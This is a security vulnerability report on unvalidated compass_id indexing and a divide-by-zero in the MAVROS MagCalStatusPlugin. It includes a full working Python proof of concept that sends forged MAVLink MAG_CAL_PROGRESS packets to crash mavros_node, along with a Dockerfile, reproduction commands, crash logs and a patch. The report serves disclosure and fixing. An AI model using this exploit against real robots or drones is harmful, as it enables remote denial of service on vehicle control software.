[REPORT] Out-of-Bounds Write and Divide-by-Zero Bugs Found in mavros_extras/src/plugins/mag_calibration_status.cpp (MAG_CAL_PROGRESS Handler)

### Summary
`mavros_extras` plugin `MagCalStatusPlugin` processes attacker-controlled `MAG_CAL_PROGRESS` fields without proper validation.  
Two issues are reachable from forged MAVLink traffic on the same link:

1. out-of-bounds access/write via unvalidated `compass_id`
2. divide-by-zero when `cal_mask == 0`

In local reproduction, this caused `mavros_node` to terminate with `exit code -8` (DoS).

### Details
Affected component:
- package: `mavros_extras`
- plugin: `MagCalStatusPlugin`
- file: `mavros/mavros_extras/src/plugins/mag_calibration_status.cpp`
- tested repository revision: latest branch (`ros2`)
- validation date for "latest": 2026-02-22

Root causes:
1. `mp.compass_id` is used as an index for fixed-size containers without bounds checking.
2. `compass_calibrating.count()` is used as a divisor without checking whether it is zero.

### Attack Preconditions
1. The attacker can send MAVLink packets to the MAVROS receiving endpoint (example: `udp://<target>:14540`).
2. Network controls between attacker and target do not block this traffic (ACL/firewall/NAT policy allows UDP path).
3. MAVROS accepts untrusted MAVLink input on that endpoint (no effective message authentication/filtering for this path).
4. Being on the same L2 network is common but not strictly required; routed reachability to the endpoint is sufficient.

### Vulnerable Code (Exact Code Snippet)
Path: `mavros/mavros_extras/src/plugins/mag_calibration_status.cpp:67`

```cpp
// Send progress of magnetometer calibration
void handle_status(
  const mavlink::mavlink_message_t * msg [[maybe_unused]],
  mavlink::ardupilotmega::msg::MAG_CAL_PROGRESS & mp,
  plugin::filter::SystemAndOk filter [[maybe_unused]])
{
  auto mcs = std_msgs::msg::UInt8();

  // How many compasses are we calibrating?
  std::bitset<8> compass_calibrating = mp.cal_mask;

  if (compass_calibrating[mp.compass_id]) {
    // Each compass gets a portion of the overall progress
    if (mp.completion_pct < 95) {
      calibration_show[mp.compass_id] = true;
    }
    _rg_compass_cal_progress[mp.compass_id] = mp.completion_pct;
  }

  // Prevent data over 100% after cal_mask reset bit assigned to compass_id
  uint16_t total_percentage = 0;
  for (size_t i = 0; i < 8 && (compass_calibrating >> i).any(); i++) {
    if (compass_calibrating[i]) {
      total_percentage += static_cast<uint8_t>(_rg_compass_cal_progress[i]);
    }
  }

  mcs.data = total_percentage / compass_calibrating.count();

  mcs_pub->publish(mcs);
}
```

Reference (defensive pattern exists only in `handle_report()`):
Path: `mavros/mavros_extras/src/plugins/mag_calibration_status.cpp:104`

```cpp
if (mr.compass_id >= calibration_show.size()) {
  return;
}
```

### Full PoC Code
```python
#!/usr/bin/env python3
"""
PoC: MAVROS mag_calibration_status trigger

This script sends crafted MAG_CAL_PROGRESS messages intended to exercise:
1) compass_id out-of-bounds indexing paths
2) cal_mask == 0 divide-by-zero path
"""

from __future__ import annotations

import argparse
import os
import time

os.environ.setdefault("MAVLINK20", "1")
from pymavlink import mavutil  # noqa: E402

mavutil.set_dialect("ardupilotmega")


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(description="Trigger MAVROS MAG_CAL_PROGRESS edge cases")
    parser.add_argument("--target", default="udpout:127.0.0.1:14540", help="MAVLink output endpoint")
    parser.add_argument("--source-system", type=int, default=1, help="MAVLink source system id")
    parser.add_argument("--source-component", type=int, default=1, help="MAVLink source component id")
    parser.add_argument("--count", type=int, default=20, help="How many times to send each payload")
    parser.add_argument("--interval", type=float, default=0.05, help="Sleep between sends (seconds)")
    parser.add_argument("--oob-compass-id", type=int, default=255, help="compass_id for OOB path")
    parser.add_argument("--oob-cal-mask", type=int, default=0xFF, help="cal_mask used with OOB payload")
    parser.add_argument("--zero-mask-compass-id", type=int, default=0, help="compass_id for zero-mask payload")
    return parser.parse_args()


def send_heartbeat(conn: mavutil.mavfile, count: int = 5, interval: float = 0.1) -> None:
    mav = mavutil.mavlink
    for _ in range(count):
        conn.mav.heartbeat_send(
            mav.MAV_TYPE_QUADROTOR,
            mav.MAV_AUTOPILOT_ARDUPILOTMEGA,
            0,
            0,
            mav.MAV_STATE_ACTIVE,
        )
        time.sleep(interval)


def main() -> int:
    args = parse_args()
    conn = mavutil.mavlink_connection(
        args.target,
        source_system=args.source_system,
        source_component=args.source_component,
    )

    print(f"[+] Connected: {args.target}")
    print("[+] Sending bootstrap heartbeats...")
    send_heartbeat(conn)

    completion_mask = [0xFF] * 10

    for i in range(args.count):
        conn.mav.mag_cal_progress_send(
            args.oob_compass_id & 0xFF,
            args.oob_cal_mask & 0xFF,
            1,
            1,
            50,
            completion_mask,
            0.0,
            0.0,
            0.0,
        )
        print(f"[+] Sent OOB payload {i + 1}/{args.count} (compass_id={args.oob_compass_id})")
        time.sleep(args.interval)

    for i in range(args.count):
        conn.mav.mag_cal_progress_send(
            args.zero_mask_compass_id & 0xFF,
            0x00,
            1,
            1,
            10,
            [0x00] * 10,
            0.0,
            0.0,
            0.0,
        )
        print(f"[+] Sent zero-mask payload {i + 1}/{args.count} (cal_mask=0)")
        time.sleep(args.interval)

    print("[+] Done. Check MAVROS logs for crash evidence.")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

### Reproduction Docker Image (Full Dockerfile)
```dockerfile
FROM ros:jazzy-ros-base-noble

ENV DEBIAN_FRONTEND=noninteractive
SHELL ["/bin/bash", "-lc"]

RUN apt-get update && apt-get install -y --no-install-recommends \
    build-essential \
    ca-certificates \
    curl \
    geographiclib-tools \
    git \
    iproute2 \
    libasio-dev \
    libgeographiclib-dev \
    net-tools \
    python3 \
    python3-click \
    python3-colcon-common-extensions \
    python3-pip \
    python3-rosdep \
    python3-vcstool \
    python3-venv \
    ros-jazzy-angles \
    ros-jazzy-diagnostic-updater \
    ros-jazzy-eigen-stl-containers \
    ros-jazzy-geographic-msgs \
    ros-jazzy-mavlink \
    wget \
    && rm -rf /var/lib/apt/lists/*

RUN rosdep init || true && rosdep update

RUN wget -qO /tmp/install_geographiclib_datasets.sh \
    https://raw.githubusercontent.com/mavlink/mavros/ros2/mavros/scripts/install_geographiclib_datasets.sh \
    && bash /tmp/install_geographiclib_datasets.sh \
    && rm -f /tmp/install_geographiclib_datasets.sh

RUN python3 -m venv /opt/poc-venv \
    && /opt/poc-venv/bin/pip install --upgrade pip \
    && /opt/poc-venv/bin/pip install pymavlink

WORKDIR /opt/ws
CMD ["bash"]
```

### Reproduction Steps
1. Save two files from this report in one working directory:
- `Dockerfile` (from "Reproduction Docker Image")
- `poc_mavros_magcal.py` (from "Full PoC Code")

2. Clone MAVROS target source (`ros2` branch).

```bash
git clone --recursive --branch ros2 https://github.com/mavlink/mavros.git mavros
```

3. Build the reproduction image from the attached `Dockerfile`.

```bash
export IMAGE_TAG=mavros-poc:jazzy
docker build -f Dockerfile -t "${IMAGE_TAG}" .
```

4. Start runtime container.

```bash
export CONTAINER_NAME=mavros-poc-repro
docker rm -f "${CONTAINER_NAME}" >/dev/null 2>&1 || true
docker run -d --name "${CONTAINER_NAME}" "${IMAGE_TAG}" sleep infinity
```

5. Copy MAVROS source and PoC into container.

```bash
docker exec "${CONTAINER_NAME}" bash -lc "rm -rf /opt/ws && mkdir -p /opt/ws"
docker cp ./mavros "${CONTAINER_NAME}:/opt/ws/mavros"
docker cp ./poc_mavros_magcal.py "${CONTAINER_NAME}:/opt/ws/poc_mavros_magcal.py"
```

6. Build MAVROS inside container.

```bash
docker exec "${CONTAINER_NAME}" bash -lc '
set -e
source /opt/ros/jazzy/setup.bash
apt-get update
cd /opt/ws/mavros
rm -rf build install log
rosdep update
rosdep install --from-paths . --ignore-src -r -y
colcon build --packages-up-to mavros mavros_extras mavros_msgs libmavconn --parallel-workers 2
'
```

7. Launch MAVROS endpoint.

```bash
docker exec -d "${CONTAINER_NAME}" bash -lc '
source /opt/ros/jazzy/setup.bash
source /opt/ws/mavros/install/setup.bash
ros2 launch mavros px4.launch fcu_url:=udp://:14540@127.0.0.1:14557 > /tmp/mavros_launch.log 2>&1
'
sleep 5
```

8. Send crafted MAG_CAL_PROGRESS payloads.

```bash
docker exec "${CONTAINER_NAME}" bash -lc '
/opt/poc-venv/bin/python /opt/ws/poc_mavros_magcal.py \
  --target udpout:127.0.0.1:14540 \
  --count 1 \
  --interval 0.05
'
```

9. Collect logs and confirm crash signature.

```bash
TIMESTAMP="$(date +%Y%m%d_%H%M%S)"
mkdir -p "output/${TIMESTAMP}"

docker cp "${CONTAINER_NAME}:/tmp/mavros_launch.log" "output/${TIMESTAMP}/mavros_launch.log"
docker exec "${CONTAINER_NAME}" bash -lc '
latest=$(ls -1dt /root/.ros/log/*/ 2>/dev/null | head -n 1 || true)
if [[ -n "$latest" && -f "${latest}launch.log" ]]; then
  cat "${latest}launch.log"
fi
' > "output/${TIMESTAMP}/ros_latest_launch.log"

grep -E "process has died|exit code -8" "output/${TIMESTAMP}/mavros_launch.log" "output/${TIMESTAMP}/ros_latest_launch.log"
```

10. Result:
- Payload class A: OOB path (`compass_id=255`, `cal_mask=0xFF`)
- Payload class B: divide-by-zero path (`cal_mask=0x00`)
- `mavros_node` terminates and logs include `process has died` and `exit code -8`.

### Trigger Success Evidence (Logs)
PoC send log:
Path: `output/20260222_040920/poc.log`

```text
[+] Connected: udpout:127.0.0.1:14540
[+] Sending bootstrap heartbeats...
[+] Sent OOB payload 1/1 (compass_id=255)
[+] Sent zero-mask payload 1/1 (cal_mask=0)
[+] Done. Check MAVROS logs for crash evidence.
```

MAVROS runtime evidence:
Path: `output/20260222_040920/mavros_launch.log`

```text
[mavros_node-1] [INFO] ... Plugin mag_calibration_status created
[mavros_node-1] [INFO] ... Plugin mag_calibration_status initialized
[mavros_node-1] [INFO] ... CON: Got HEARTBEAT, connected. FCU: ArduPilot
[ERROR] [mavros_node-1]: process has died [pid 11245, exit code -8, cmd '.../mavros_node ...'].
```

Launch summary evidence:
Path: `output/20260222_040920/ros_latest_launch.log`

```text
[ERROR] [mavros_node-1]: process has died [pid 11245, exit code -8, cmd '.../mavros_node ...'].
```

### Impact
- Vulnerability class: out-of-bounds memory access/write + divide-by-zero.
- Practical impact: remote denial of service of `mavros_node` on shared/untrusted MAVLink links.
- Additional risk: undefined behavior from OOB write may introduce memory corruption side effects depending on build/runtime.

### Suggested Fix
1. Add bounds check in `handle_status()` before any `mp.compass_id` indexing.
2. Add zero-divisor guard before `total_percentage / compass_calibrating.count()`.
3. Optionally drop/reset malformed calibration progress state.

--- a/mavros_extras/src/plugins/mag_calibration_status.cpp
+++ b/mavros_extras/src/plugins/mag_calibration_status.cpp
@@ -74,7 +74,7 @@ private:
     // How many compasses are we calibrating?
     std::bitset<8> compass_calibrating = mp.cal_mask;
 
-    if (compass_calibrating[mp.compass_id]) {
+    if (mp.compass_id < calibration_show.size() && compass_calibrating[mp.compass_id]) {
       // Each compass gets a portion of the overall progress
       if (mp.completion_pct < 95) {
         calibration_show[mp.compass_id] = true;
@@ -90,7 +90,7 @@ private:
       }
     }
 
-    mcs.data = total_percentage / compass_calibrating.count();
+    mcs.data = compass_calibrating.any() ? total_percentage / compass_calibrating.count() : 0;
 
     mcs_pub->publish(mcs);
   }

